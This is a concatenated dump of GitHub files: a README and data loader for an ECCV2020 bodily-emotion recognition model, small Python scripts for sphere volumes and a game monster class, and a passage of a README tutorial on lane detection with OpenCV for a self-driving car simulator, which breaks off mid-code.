"c9ab74ae878b214987b6bdc236335218899e61ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 406, "num_lines": 55, "path": "/README.md", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "# NTUA-BEEU-ECCV\n\nWinning solution for the BEEU (First International Workshop on Bodily Expressed Emotion Understanding) challenge organized at ECCV2020. Please read the accompanied paper for more details. \n\n### Preparation\n* Download the [BoLD dataset](https://cydar.ist.psu.edu/emotionchallenge/index.php).\n* Use [https://github.com/yjxiong/temporal-segment-networks](https://github.com/yjxiong/temporal-segment-networks) in order to extract rgb and optical flow for the dataset.\n* Change the directories in \"dataset.py\" file.\n\n\n### Training\n\nTrain an RGB Temporal Segment Network on BoLD dataset:\n\n> python train_tsn.py -c config_tsn.json --modality \"RGB\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb tsn\" -d 0,1,2,3\n\nAdd context branch:\n\n> python train_tsn.py -c config_tsn.json --modality \"RGB\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb with context tsn\" -d 0,1,2,3 --context\n\nAdd visual embedding loss:\n\n> python train_tsn.py -c config_tsn.json --modality \"RGB\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb with context tsn\" -d 0,1,2,3 --context --embed\n\nChange modality to Flow:\n\n> python train_tsn.py -c config_tsn.json --modality \"Flow\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb tsn\" -d 0,1,2,3\n\n\n### Pretrained Models\nWe also offer weights of an RGB with context model with 0.2213 validation ERS and a Flow model with 0.2157 validation ERS. Their fusion achieves an ERS of 0.2613 on the test set. You can download the pretrained models [here](https://ntuagr-my.sharepoint.com/:f:/g/personal/filby_ntua_gr/EkFAi_QSn9NDsFTylvoAJrQBuvh6eQWkbgTuZcyMWWPR2w?e=xxw6h9). An example on how to use them is shown in test_tsn.py script:\n\n> python test_tsn.py --modality \"RGB\" --arch resnet101 --workers 4 --context\n> python test_tsn.py --modality \"Flow\" --arch resnet101 --workers 4 \n\n\n## Citation\nIf you use this code for your research, consider citing our paper.\n```\n@inproceedings{NTUA_BEEU,\n title={Emotion Understanding in Videos Through Body, Context, and Visual-Semantic Embedding Loss},\n author={Filntisis, Panagiotis Paraskevas and Efthymiou, Niki and Potamianos, Gerasimos and Maragos, Petros},\n booktitle={ECCV Workshop on Bodily Expressed Emotion Understanding},\n year={2020}\n}\n```\n\n### Acknowlegements\n\n* [https://github.com/yjxiong/tsn-pytorch](https://github.com/yjxiong/tsn-pytorch)\n* [https://github.com/victoresque/pytorch-template](https://github.com/victoresque/pytorch-template)\n\n\n### Contact \nFor questions feel free to open an issue." }, { "alpha_fraction": 0.5527679920196533, "alphanum_fraction": 0.5648953914642334, "avg_line_length": 36.37716293334961, "blob_id": "c095aabebc50cab8c5c0d6c5e9c9282fb31e9df5", "content_id": "baa718f4831ed55e41b2a10389accec69d4e23bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10802, "license_type": "no_license", "max_line_length": 169, "num_lines": 289, "path": "/dataset.py", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "import torch.utils.data as data\nimport cv2\nfrom PIL import Image\nimport os\nimport os.path\nimport numpy as np\nfrom numpy.random import randint\nimport pandas as pd\nimport torch\nimport torchvision.transforms.functional as tF\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\n\nclass VideoRecord(object):\n def __init__(self, row):\n self._data = row\n\n @property\n def path(self):\n return self._data[0]\n\n @property\n def num_frames(self):\n return int(self._data[1])\n \n @property\n def min_frame(self):\n return int(self._data[2])\n\n @property\n def max_frame(self):\n return int(self._data[3])\n\n\nclass TSNDataSet(data.Dataset):\n def __init__(self, mode,\n num_segments=3, new_length=1, modality='RGB',\n image_tmpl='img_{:05d}.jpg', transform=None,\n force_grayscale=False, random_shift=True, test_mode=False, context=False):\n\n self.num_segments = num_segments\n self.new_length = new_length\n self.modality = modality\n self.image_tmpl = image_tmpl\n self.transform = transform\n self.random_shift = random_shift\n self.test_mode = test_mode\n\n self.bold_path = \"/gpu-data/filby/BoLD/BOLD_public\"\n\n self.context = context\n\n self.categorical_emotions = [\"Peace\", \"Affection\", \"Esteem\", \"Anticipation\", \"Engagement\", \"Confidence\", \"Happiness\",\n \"Pleasure\", \"Excitement\", \"Surprise\", \"Sympathy\", \"Doubt/Confusion\", \"Disconnect\",\n \"Fatigue\", \"Embarrassment\", \"Yearning\", \"Disapproval\", \"Aversion\", \"Annoyance\", \"Anger\",\n \"Sensitivity\", \"Sadness\", \"Disquietment\", \"Fear\", \"Pain\", \"Suffering\"]\n\n self.continuous_emotions = [\"Valence\", \"Arousal\", \"Dominance\"]\n\n self.attributes = [\"Gender\", \"Age\", \"Ethnicity\"]\n\n header = [\"video\", \"person_id\", \"min_frame\", \"max_frame\"] + self.categorical_emotions + self.continuous_emotions + self.attributes + [\"annotation_confidence\"]\n \n # self.df = pd.read_csv(os.path.join(self.bold_path, \"annotations/{}_extra.csv\".format(mode)))\n self.df = pd.read_csv(os.path.join(self.bold_path, \"annotations/{}.csv\".format(mode)), names=header)\n self.df[\"joints_path\"] = self.df[\"video\"].apply(rreplace,args=[\".mp4\",\".npy\",1])\n\n self.video_list = self.df[\"video\"]\n self.mode = mode\n\n self.embeddings = np.load(\"glove_840B_embeddings.npy\")\n\n def get_context(self, image, joints, format=\"cv2\"):\n joints = joints.reshape((18,3))\n joints[joints[:,2]<0.1] = np.nan\n joints[np.isnan(joints[:,2])] = np.nan\n\n joint_min_x = int(round(np.nanmin(joints[:,0])))\n joint_min_y = int(round(np.nanmin(joints[:,1])))\n\n joint_max_x = int(round(np.nanmax(joints[:,0])))\n joint_max_y = int(round(np.nanmax(joints[:,1])))\n\n expand_x = int(round(10/100 * (joint_max_x-joint_min_x)))\n expand_y = int(round(10/100 * (joint_max_y-joint_min_y)))\n\n if format == \"cv2\":\n image[max(0, joint_min_x - expand_x):min(joint_max_x + expand_x, image.shape[1])] = [0,0,0]\n elif format == \"PIL\":\n bottom = min(joint_max_y+expand_y, image.height)\n right = min(joint_max_x+expand_x,image.width)\n top = max(0,joint_min_y-expand_y)\n left = max(0,joint_min_x-expand_x)\n image = np.array(image)\n if len(image.shape) == 3:\n image[top:bottom,left:right] = [0,0,0]\n else:\n image[top:bottom,left:right] = np.min(image)\n return Image.fromarray(image)\n\n\n def get_bounding_box(self, image, joints, format=\"cv2\"):\n joints = joints.reshape((18,3))\n joints[joints[:,2]<0.1] = np.nan\n joints[np.isnan(joints[:,2])] = np.nan\n\n joint_min_x = int(round(np.nanmin(joints[:,0])))\n joint_min_y = int(round(np.nanmin(joints[:,1])))\n\n joint_max_x = int(round(np.nanmax(joints[:,0])))\n joint_max_y = int(round(np.nanmax(joints[:,1])))\n\n expand_x = int(round(100/100 * (joint_max_x-joint_min_x)))\n expand_y = int(round(100/100 * (joint_max_y-joint_min_y)))\n\n if format == \"cv2\":\n return image[max(0,joint_min_y-expand_y):min(joint_max_y+expand_y, image.shape[0]), max(0,joint_min_x-expand_x):min(joint_max_x+expand_x,image.shape[1])]\n elif format == \"PIL\":\n bottom = min(joint_max_y+expand_y, image.height)\n right = min(joint_max_x+expand_x,image.width)\n top = max(0,joint_min_y-expand_y)\n left = max(0,joint_min_x-expand_x)\n return tF.crop(image, top, left, bottom-top ,right-left)\n\n\n def joints(self, index):\n sample = self.df.iloc[index]\n\n joints_path = os.path.join(self.bold_path, \"joints\", sample[\"joints_path\"])\n\n joints18 = np.load(joints_path)\n joints18[:,0] -= joints18[0,0]\n\n return joints18\n\n def _load_image(self, directory, idx, index, mode=\"body\"):\n joints = self.joints(index)\n\n poi_joints = joints[joints[:, 0] + 1 == idx]\n sample = self.df.iloc[index]\n poi_joints = poi_joints[(poi_joints[:, 1] == sample[\"person_id\"]), 2:]\n if self.modality == 'RGB' or self.modality == 'RGBDiff':\n\n frame = Image.open(os.path.join(directory, self.image_tmpl.format(idx))).convert(\"RGB\")\n \n if mode == \"context\":\n if poi_joints.size == 0:\n return [frame]\n context = self.get_context(frame, poi_joints, format=\"PIL\")\n return [context]\n\n if poi_joints.size == 0:\n body = frame\n pass #just do the whole frame\n else:\n body = self.get_bounding_box(frame, poi_joints, format=\"PIL\")\n\n if body.size == 0:\n print(poi_joints)\n body = frame\n\n return [body]\n\n # return [Image.open(os.path.join(directory, self.image_tmpl.format(idx))).convert('RGB')]\n elif self.modality == 'Flow':\n frame_x = Image.open(os.path.join(directory, self.image_tmpl.format('flow_x', idx))).convert('L')\n frame_y = Image.open(os.path.join(directory, self.image_tmpl.format('flow_y', idx))).convert('L')\n # frame = cv2.imread(os.path.join(directory, 'img_{:05d}.jpg'.format(idx)))\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n if mode == \"context\":\n if poi_joints.size == 0:\n return [frame_x, frame_y]\n context_x = self.get_context(frame_x, poi_joints, format=\"PIL\")\n context_y = self.get_context(frame_y, poi_joints, format=\"PIL\")\n return [context_x, context_y]\n\n if poi_joints.size == 0:\n body_x = frame_x\n body_y = frame_y\n pass #just do the whole frame\n else:\n body_x = self.get_bounding_box(frame_x, poi_joints, format=\"PIL\")\n body_y = self.get_bounding_box(frame_y, poi_joints, format=\"PIL\")\n\n if body_x.size == 0:\n body_x = frame_x\n body_y = frame_y\n\n\n return [body_x, body_y]\n\n\n def _sample_indices(self, record):\n \"\"\"\n\n :param record: VideoRecord\n :return: list\n \"\"\"\n\n average_duration = (record.num_frames - self.new_length + 1) // self.num_segments\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + randint(average_duration, size=self.num_segments) # + (record.min_frame+1)\n # print(record.num_frames, record.min_frame, record.max_frame)\n elif record.num_frames > self.num_segments:\n offsets = np.sort(randint(record.num_frames - self.new_length + 1, size=self.num_segments))\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets + 1\n\n def _get_val_indices(self, record):\n if record.num_frames > self.num_segments + self.new_length - 1:\n tick = (record.num_frames - self.new_length + 1) / float(self.num_segments)\n offsets = np.array([int(tick / 2.0 + tick * x) for x in range(self.num_segments)])\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets + 1\n\n def _get_test_indices(self, record):\n\n tick = (record.num_frames - self.new_length + 1) / float(self.num_segments)\n\n offsets = np.array([int(tick / 2.0 + tick * x) for x in range(self.num_segments)])\n\n return offsets + 1\n\n def __getitem__(self, index):\n sample = self.df.iloc[index]\n\n fname = os.path.join(self.bold_path,\"videos\",self.df.iloc[index][\"video\"])\n\n capture = cv2.VideoCapture(fname)\n frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))-1\n\n capture.release()\n\n record_path = os.path.join(self.bold_path,\"test_raw\",sample[\"video\"][4:-4])\n\n record = VideoRecord([record_path, frame_count, sample[\"min_frame\"], sample[\"max_frame\"]])\n\n if not self.test_mode:\n segment_indices = self._sample_indices(record) if self.random_shift else self._get_val_indices(record)\n else:\n segment_indices = self._get_test_indices(record)\n\n return self.get(record, segment_indices, index)\n\n def get(self, record, indices, index):\n\n images = list()\n # print(indices)\n for seg_ind in indices:\n p = int(seg_ind)\n for i in range(self.new_length):\n \n seg_imgs = self._load_image(record.path, p, index, mode=\"body\")\n\n images.extend(seg_imgs)\n\n if self.context:\n seg_imgs = self._load_image(record.path, p, index, mode=\"context\")\n images.extend(seg_imgs)\n\n\n if p < record.num_frames:\n p += 1\n\n\n if not self.test_mode:\n categorical = self.df.iloc[index][self.categorical_emotions]\n\n continuous = self.df.iloc[index][self.continuous_emotions]\n continuous = continuous/10.0 # normalize to 0 - 1\n\n if self.transform is None:\n process_data = images\n else:\n process_data = self.transform(images)\n\n return process_data, torch.tensor(self.embeddings).float(), torch.tensor(categorical).float(), torch.tensor(continuous).float(), self.df.iloc[index][\"video\"]\n else:\n process_data = self.transform(images)\n return process_data, torch.tensor(self.embeddings).float()\n\n def __len__(self):\n return len(self.df)\n" } ]
4
tomaccosheep/teaching_pillow
https://github.com/tomaccosheep/teaching_pillow
a82c3e114c874743ad12db2bdbc19f2aa5c215f4
4bb1b1f95a7831e4db5545c54345ba8ba1071241
149002c29d6893bc4473e58b090658462ebf19bf
refs/heads/master
2020-03-30T11:15:35.556579
2018-10-01T21:32:06
2018-10-01T21:32:06
151,163,192
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.460234671831131, "alphanum_fraction": 0.49413299560546875, "avg_line_length": 32.34782791137695, "blob_id": "db1b40779df90ebb60d749f9f4502e7bbc303cc7", "content_id": "515a7933356ec48f86a9dd0ac5b23b165f5c5ea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 767, "license_type": "no_license", "max_line_length": 83, "num_lines": 23, "path": "/lab16v1.py", "repo_name": "tomaccosheep/teaching_pillow", "src_encoding": "UTF-8", "text": "import colorsys\nfrom PIL import Image\nimg = Image.open(\"lenna.png\") # must be in same folder\nwidth, height = img.size\npixels = img.load()\n\nfor i in range(width):\n for j in range(height):\n if i + 50 < width and j + 50 < height:\n color_list = [0, 0, 0]\n for k in range(len(color_list)):\n for l in range(0, 50):\n color_list[k] += (pixels[i + l, j][k])/50\n \n else:\n color_list = pixels[i, j]\n #h, s, v = colorsys.rgb_to_hsv(r/255, g/255, b/255)\n #h = ((h) // user_input) * user_input\n #s = 1\n #v = .5\n #r, g, b = colorsys.hsv_to_rgb(h, s, v)\n pixels[i, j] = (int(color_list[0]), int(color_list[1]), int(color_list[2]))\nimg.show()\n" } ]
1
ivan-monge1989/pruebas
https://github.com/ivan-monge1989/pruebas
b2f85cc02db326acde08bbb2fb2227da858cc8c4
c50e4ad4dd7bc994978080b674bc931b3789ede2
67378cd2b048616460fc659ec6f145bcb6b46a8e
refs/heads/master
2017-12-31T14:09:40.682669
2017-04-05T21:59:37
2017-04-05T21:59:37
68,965,918
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.752293586730957, "alphanum_fraction": 0.752293586730957, "avg_line_length": 17.16666603088379, "blob_id": "78a64fa2ca3cc91e779d62391d8d6863c4d13866", "content_id": "65b6adacad19d7cc68e30a47f1f95aa7d0afcb38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 109, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/monster_type.py", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "# Create several creatures for my game.\n\nimport monster\n\ncreep = monster.Monster()\nwitch = monster.Monster()\n" }, { "alpha_fraction": 0.5662811398506165, "alphanum_fraction": 0.6089857816696167, "avg_line_length": 24.545454025268555, "blob_id": "86a12c7c5dc9f1395a8339c4981ecd22c2d0c27f", "content_id": "08cae9f81c5405ffbecaaeeed60a89d42dc5be6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2248, "license_type": "no_license", "max_line_length": 72, "num_lines": 88, "path": "/sphere_volume.py", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n# This script allows me to create a class of ball spheres which have the\n# properties of a metallic sphere from McMaser-Carr.\n\n# Little test for gagi\n\n\nclass Ball:\n \"\"\"Creates a Ball class for metal spheres in McMaster-Carr.\n\n Arguments:\n dia (float): Diameter of the sphere\n qty (int): Quantity of balls in the bags\n price (float): Price per bag\n \"\"\"\n def __init__(self, dia=1, qty=1, price=1):\n import math\n self.dia = dia\n self.qty = qty\n self.price = price\n self.rad = dia/2\n self.vol = ((4/3) * math.pi * self.rad ** 3) * self.qty\n self.quarts = self.vol * 0.017316\n\n\n# Create a function to display ball data\ndef display_ball(balls, bags):\n \"\"\"\n Prints out ball data for each sphere.\n \"\"\"\n\n for i in balls:\n print(\"Ball Data:\")\n print(\"Diameter: \" + str(i.dia) + \"in\")\n print(\"Total Vol: \" + str(i.quarts * bags) + \"qts\")\n print(\"Total Qty of balls: \" + str(i.qty * bags))\n print(\"Total Price: $\" + str(i.price * bags) + \"\\n\")\n\n\n# Creates a function to convert milliliters to cubic inches\ndef mL_to_in3(vol):\n \"\"\"\n Converts milliliters to cubic inches.\n \"\"\"\n\n milliliters = vol * 0.0610237\n return milliliters\n\n\n# Creates a function to conver cubic inches to milliliters\ndef in3_to_mL(vol):\n \"\"\"\n Converts cubic inches to milliliters\n \"\"\"\n\n cubic_inches = vol * 16.3871\n return cubic_inches\n\n\n# Creates a function to determine the amount of minimal solvent\ndef solvent_qty(width, length, height, ball, bags, vane_vol):\n \"\"\"\n Returns the minimal amount of solvent required\n \"\"\"\n\n pyrex_vol = width * length * height\n slab_vol1 = 40\n slab_vol2 = 40\n ball_vol = ball.vol * bags\n\n tot_disp_vol = slab_vol1 + slab_vol2 + ball_vol + vane_vol\n\n req_vol = pyrex_vol - tot_disp_vol\n return req_vol\n\n\n# Ball Data from McMaster-Carr\nball_5_8 = Ball(5/8, 50, 7.65)\nball_3_4 = Ball(3/4, 25, 7.67)\nball_7_8 = Ball(7/8, 20, 9.82)\nball_1_0 = Ball(1.0, 10, 6.82)\nballs = [ball_5_8, ball_3_4, ball_7_8, ball_1_0]\nbags = 5\n\nvane_vol = mL_to_in3(100 * 4)\ndynasol = in3_to_mL(solvent_qty(9, 13, 2, ball_7_8, bags, vane_vol))\nprint(dynasol)\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 30.5, "blob_id": "e508dd1baafdf8066e346893199ffda06c70034c", "content_id": "d1afb1e62d2da9364442ce0035a8c00589eb8ade", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 67, "num_lines": 4, "path": "/README.md", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "# prueba-windows\n\nThis is just a simple testing document.\nI am trying to compile some files and push and pull them to Github.\n" }, { "alpha_fraction": 0.5645756721496582, "alphanum_fraction": 0.5848708748817444, "avg_line_length": 23.636363983154297, "blob_id": "1e9d4fbe56e625fa1f5b0fae52cd5b6d6aadbbaf", "content_id": "a4a5142b162253eeb4f52e5f8ff3ec0c494296bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 542, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/monster.py", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "# This is a monster class for my little game.\n# This is also an example file.\n\nclass Monster:\n \"\"\"Creater a monster class with basic Health Points (HP)\n and Magic Points (MP).\"\"\"\n\n def __init__(self):\n self.hp = 10\n self.mp = 5\n\n def decrease_health(self, factor= 1):\n self.hp -= 1 * factor\n\n def increase_health(self, factor= 1):\n self.hp += 1 * factor\n\n def increase_magic(self, factor= 1):\n self.mp += 1 * factor\n\n def decrease_health(self, factor= 1):\n self.mp -= 1 * factor\n" } ]
4
nikkkkhil/self-driving-car-simulation-using-CNN
https://github.com/nikkkkhil/self-driving-car-simulation-using-CNN
8e192d61cf56f3f743b9c537aa47119fe79776ef
5f41888f55d128c89f834c0c94124216bb201ae2
43757cfd36aadd2e617fa74c99ebdb1ef1f45889
refs/heads/master
2020-08-03T17:04:40.027681
2019-09-30T09:17:12
2019-09-30T09:17:12
211,822,035
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6690725684165955, "alphanum_fraction": 0.7035109996795654, "avg_line_length": 61.71052551269531, "blob_id": "fe316273621c76a899476616e74c50c7386fd3f7", "content_id": "d94990a0a69942a87edb52c3b4cfb39db7b1902f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35745, "license_type": "no_license", "max_line_length": 575, "num_lines": 570, "path": "/README.md", "repo_name": "nikkkkhil/self-driving-car-simulation-using-CNN", "src_encoding": "UTF-8", "text": "# Self-Driving-Car-3D-Simulator-With-CNN\n<p>\n <img align=\"left\" width=\"425\" height=\"400\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/3D%20Car%20Simulator.png\">\n <img align=\"right\" width=\"420\" height=\"400\" src=\"https://upload.wikimedia.org/wikipedia/commons/thumb/0/0a/Python.svg/2000px-Python.svg.png\">\n</p>\n<p>\n <img align=\"center\" width=\"600\" height=\"7\" src=\"http://getthedrift.com/wp-content/uploads/2015/06/White-Space.png\">\n</p>\n\n## Introduction\n<p align=\"center\">\n Self Driving car after 50 epochs of training<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/SelfDrivingAfter50Epochs.gif\">\n</p>\n\nSome point in our life as programmers we all wonder how a self driving car is actually programmed. I went through the same phase and so here it is, a very simple DIGITAL self driving car controlled using Python with a Reinforcement Q-learning algorithm as well as a Convolutional Neural Network.\n\nYou can essentially apply this to any game, the algorithm can be adapted and the reward rules can be changed to allow for different outcomes. As we go through the code I will explain step by step what each line does and once you've mastered it you can go ahead fork the code and do as you wish.\n\n```\nNote: You need to have sufficient knowledge about Reinforcment learning before progressing, this tutorial \nonly explains the code it does not go into the theoretical details\nThe links below help explain the theoretical details as well as other details I had problems with:\n\nhttps://stats.stackexchange.com/questions/221402/understanding-the-role-of-the-discount-factor-in-reinforcement-learning\nhttp://mnemstudio.org/path-finding-q-learning-tutorial.htm\nhttps://yanpanlau.github.io/2016/07/10/FlappyBird-Keras.html\nhttps://keon.io/deep-q-learning/\nhttps://en.wikipedia.org/wiki/Q-learning\nhttps://medium.com/emergent-future/simple-reinforcement-learning-with-tensorflow-part-0-q-learning-with-tables-and-neural-networks-d195264329d0\n```\n\nWe will be using Keras to make the magic happen with Tensorflow backend. Assuming you are familiar with Keras and Tensorflow and have them installed we can start!\n\n```\nNote: Check my other gits for brief explanation on Keras and other simple algorithms such as the CNN \nand RNN if you are unfamiliar with Keras/Tensorflow!\n```\n\n## My Setup\n\nIn order to detect lanes, we need to send game frames to the algorithm for processing. I used a library called [mss](https://pypi.python.org/pypi/mss/)(MultipleScreenShot), it allows the users to take quick screenshots with almost minimal effect in FPS.\nUnfortunately, it takes the screen shot of the entire screen if coordinates aren't specified, therefore in order to get game frames, the game needs to be properly positioned. \n\nThe picture below depicts my environment.\n\n<p align=\"center\">\n Layout as displayed on my screen\n <img width=\"800\" height=\"600\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/Environment.png\">\n</p>\n<p>\n <img width=\"600\" height=\"4\" src=\"http://getthedrift.com/wp-content/uploads/2015/06/White-Space.png\">\n</p>\nYou can set it up anyway you want but make sure to change the coordinates of the ScreenShot module so it only covers the game area.\n\nBefore we start the implementation it's a good idea to have the code open on the side as the comments have details you wouldn't want to miss.\n\n## Implementation\n\n### Imports\n```python\n1 import cv2\n2 import mss\n3 import numpy as np\n4 from keras.models import Sequential\n5 from keras.layers import Dense, Flatten\n6 from keras.optimizers import SGD\n7 from keras.layers.convolutional import Conv2D\n8 import pyautogui as p\n9 import random\n10 import time\n```\nWe start by importing a couple libraries. \nIn order, we import OpenCV, our Mss library, Numpy for computation, Keras for our CNN, Pyautogui to control our keyboard, Random and finally Time for delay purposes.\n\n### Detecting Lanes\n```python\n1 #Function calculates the lanes\n2 def CalculateLanes(OrgImage):\n3 errors = False\n4 #Since our game has yellow lanes, we can detect a specific color\n5 #keep that color, and get rid of everything else to make it easier\n6 #to detect the yellow lanes\n7 #So we convert our image to the HSL color scheme\n8 HSLImg = cv2.cvtColor(OrgImage, cv2.COLOR_BGR2HLS)\n9 #The lower and upper arrays define boundaries of the BGR color space\n10 #BGR because OpenCV represents images in Numpy in reverse order\n11 #So for our yellow color we say that our pixels color that are yellow will be\n12 # R>= 100, B >= 0, G>=10 (lower limit), R<=255, B<=255, G<=40\n13 lower = np.uint8([ 10, 0, 100])\n14 upper = np.uint8([ 40, 255, 255])\n15 #inRange basically finds the color we want in the HLSImg with the lower and upper\n16 #boundaries(the ranges)\n17 yellow_mask = cv2.inRange(HSLImg, lower, upper)\n18 #We then apply this mask to our original image, and this returns an image showing\n19 #only the pixels that fall in the range of that mask\n20 YellowImg = cv2.bitwise_and(OrgImage, OrgImage, mask=yellow_mask)\n21 #Convert the original image to gray\n22 GrayImg = cv2.cvtColor(YellowImg, cv2.COLOR_BGR2GRAY)\n23 #Apply blurring\n24 #The 5x5 is the gaussianblur kernel convolved with image\n25 #The 0 is the sigmaX and SigmaY standard deviation usually taken as 0\n26 blurredImg = cv2.GaussianBlur(GrayImg, (5, 5), 0)\n27 #Detect edges in the image\n28 #700 is the max val, any edges above the intensity gradient of 700 are edges\n29 #200 is the lowest intensity gradient, anything below is not an edge\n30 imageWithEdges = cv2.Canny(blurredImg, threshold1=200, threshold2=700)\n31 #These are the points of our trapezoid/hexagon that we crop out \n32 points = np.array([[0, 310],[0, 300], [220, 210], [380, 210], [600, 300], [600, 310]])\n33 #Now we calculate the region of interest\n35 #We first create a mask (a blank black array same size as our image)\n36 mask = np.zeros_like(imageWithEdges)\n37 #Then we fill the mask underneath the points(inside the polygon) we defined\n38 #with color white (255)(This is the part of the image we want to process)\n39 cv2.fillPoly(mask, [points], 255)\n40 #this bitwise and function basically combines the two images\n41 #The coloured bit where the pixels had a value 255 is kept while the\n42 #top bit is removed (which is 0)\n43 croppedImg = cv2.bitwise_and(blurredImg, mask)\n```\n**Line 2** Our parameter being our screen shot (OrgImage)\n\n**Line 3** We initialise our variable errors to False indicating that currently we have no errors produced\n\n**Line 8** The lanes in the game are yellow and so we convert our image to the HSL color space in order to enhance our lanes.\nThey were not very clear in the RGB space, therefore HSL was used.\n\n**Line 13&14** We define our upper and lower limit of the color space. Although the boundaries are given in terms of RGB it is actually in HSL. The comments are in RGB to make it easier to understand. Those limits represent the region where the color yellow falls within. Therefore, we use those limits so we can seek out a similar color.\n\n**Line 17** Now we apply the limits to our HSL image. It seeks out the color yellow and sets the rest of the pixels of the image to 0. We have essentially created a mask. An area where relevant pixels keep their values and the ones not needed are set to 0. \n\n**Line 20** The bitwise_and function basically takes a look at the pixel values and if the pixel value in the mask and the pixel value in the image have the same value they are kept, if they are different then it is set to 0. We are left with a image with only yellow region visible.\n\n<p align=\"center\">\n Yellow Image<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/YellowImg.png\">\n</p>\n\n**Line 22** Now we can convert our image to grayscale. We do this in order to make the edge detection more accurate. The canny edge detection function used later on essentially measures the magnitude of pixel intensity changes. Therefore if we have colors that are similar to each other there isn't a big change in pixel intensity and it might not be considered an edge. Grayscale images are also less computation heavy.\n\n**Line 26** We now apply a gaussian blur. We do this in order to get rid of rough edges. Some realistic games or even in real life there are cracks on the road that might be considered something of interest so in order to get rid of the \"noisy edges\" we apply a blur.\n\n**Line 30** Now we finally apply the edge detection function. We have thresholds that identify what can and cannot be considered an edge.\n\n**Line 32** We don't want all the edges detected in the image. We only want those that concern the lanes. So we create a region of interest, a specific set of coordinates. \n\n**Line 36** We create an empty black mask with the same space dimension as our image.\n\n**Line 39** Anything around the polygon defined by our ROI is filled with black while the inside is filled with the color white (255).\n\n**Line 43** Finally we take our blurred image and we apply our mask to it. So the white region of our mask is replaced with our image while the rest is black (not used).\n\n<p align=\"center\">\n croppedImg<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/croppedImg.png\">\n</p>\n\nGreat now we've managed to narrow down our edges to the region that we are interested in. Thats most of the processing done. We now want to get the appropriate lines and combine them into lanes. The next half of this function does exactly that.\n\n```python\n1 #Basically the accumulation of the most imperfect edges with the minimum\n2 #length being defined by 180\n3 #Thickness of the lines is 5\n4 lines = cv2.HoughLinesP(croppedImg, 1, np.pi/180, 180, np.array([]), 180, 5)\n5 #Now we need to find the slope, intercept and length of each of our detected lines\n6 left_lines = []\n7 length_left = []\n8 right_lines = []\n9 length_right = []\n10 #We may not always detect a line that is why we do try/except statement\n11 try:\n12 for line in lines:\n13 #Coordinates of a single line\n14 for x1, y1, x2, y2 in line:\n15 #We dont want a vertical line or a horizontal line\n16 if x1==x2 or y1==y2:\n17 continue\n18 #Slope formula\n19 slope = (y2-y1)/(x2-x1)\n20 #Intercept\n21 intercept = y1 - slope*x1\n22 #Length\n23 length = np.sqrt((y2-y1)**2+(x2-x1)**2)\n24 #Y is reversed in images therefore a negative slope is a left line not right\n25 if slope<0:\n26 left_lines.append((slope, intercept))\n27 length_left.append((length))\n28 else:\n29 right_lines.append((slope, intercept))\n30 length_right.append((length))\n31 #Now we have collected our similar lines into right and left lists\n32 #Now we can convert them into lanes by dot product all the similar lines with lengths\n33 #The longer lines are weighted more therefore affect the lanes more\n34 #Then we normalise them by dividing by sum of the lengths(sort of like averaginng)\n35 left_lane = np.dot(length_left, left_lines) /np.sum(length_left) if len(length_left) >0 else None\n36 right_lane = np.dot(length_right, right_lines)/np.sum(length_right) if len(length_right)>0 else None\n37 #Now we have the right LANE and the left LANE through averaging and dot product\n38 #Now we need to convert them back into coordinates for pixel points\n39 #Having an equation of a line (assume infinite) we can select arbitrary points and find\n40 #the x or y value accordingly.\n41 #So we select arbitrary points for y1 = croppedImg.shape[0]\n42 #and for y2 = y1*0.6, We need this in order to draw our lines (converting to pixel coordinates)\n43 #We all need them to be int so cv2.line can use them\n44 LeftX1 = int((croppedImg.shape[0] - left_lane[1])/left_lane[0])\n45 LeftX2 = 